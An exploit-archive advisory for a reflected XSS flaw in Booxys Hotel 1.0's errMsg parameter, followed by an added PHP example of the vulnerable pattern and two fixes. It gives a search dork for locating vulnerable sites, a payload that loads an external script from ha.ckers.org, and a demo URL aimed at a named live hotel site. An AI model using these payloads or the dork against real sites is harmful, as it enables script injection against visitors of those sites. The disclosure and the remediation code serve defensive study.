Booxys Hotel 1.0 Cross Site Scripting

2011.06.10
Credit: Net.Edit0r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#(+)Exploit Title: booxys Hotel [index.php] Cross site scripting Vulnerability
#(+)Author : Net.Edit0r
#(+)Software Link : http://www.booxys.com/
#(+) E-mail : Black.hat.tm@Gmail.com & Net.Edit0r@att.net
#(+) dork : inurl:"index.php?errMsg="
#(+) Version : [1.0]
#(+) Category : Web Apps [XSS]
#(+) Platform : Tested on: linux
____________________________________________________________________

The security problem is in the file "index.php".
You can disable this security problem Plagn take it away.

[~] Vulnerable File :
# [+]http://localhost.com/de/index.php?errMsg=[XSS]

[~] Cross-site scripting Vulnerability
# [+]/de/index.php?errMsg=[XSS]
# [+]http://localhost.com/de/index.php?errMsg=<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

[~] Demo :
http://www.hotel-board.com/de/index.php?errMsg=<script>alert(1);</script>
____________________________________________________________________

########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)#BHG Member : & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly
(+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ M4hd1 ~ Mikili ~ 4min
(+)Gr33ts to : Black-Hg.Org ~ Pentesters.ir & All Iranian HackerZ
########################################################################
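
The reflected errMsg parameter described above, shown as an assumed vulnerable pattern beside two fixes. This is an added example, not part of the original advisory or the Booxys code; the advisory does not show index.php's source, so the function names, the markup and the error-code table are hypothetical.

```php
<?php
// Added example. The real index.php is not shown in the advisory; all
// function names and the message table below are hypothetical.

// Assumed vulnerable pattern: the raw errMsg value is written into the page.
function render_error_vulnerable(array $query): string
{
    $msg = $query['errMsg'] ?? '';
    return '<div class="error">' . $msg . '</div>';
}

// Fix 1: encode the value for the HTML context before output.
function render_error_escaped(array $query): string
{
    $msg = $query['errMsg'] ?? '';
    if (!is_string($msg)) {
        $msg = ''; // errMsg[]=x arrives as an array, not a string
    }
    $safe = htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="error">' . $safe . '</div>';
}

// Fix 2: accept only a known error code and emit server-side text, so no
// request-supplied text reaches the page at all.
const ERROR_MESSAGES = [
    'login_failed'    => 'Login failed.',
    'session_expired' => 'Your session has expired.',
];

function render_error_by_code(array $query): string
{
    $code = $query['errMsg'] ?? '';
    $known = is_string($code) && array_key_exists($code, ERROR_MESSAGES);
    $text = $known ? ERROR_MESSAGES[$code] : 'An error occurred.';
    return '<div class="error">' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</div>';
}

// Constructed input: the value from the advisory's demo URL.
$query = ['errMsg' => '<script>alert(1);</script>'];
echo render_error_vulnerable($query), "\n"; // markup passes through unchanged
echo render_error_escaped($query), "\n";    // angle brackets become entities
echo render_error_by_code($query), "\n";    // unknown code, generic message
```

Fix 2 changes what errMsg means (a code instead of free text), so callers that redirect with a message string have to be updated to pass a code.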

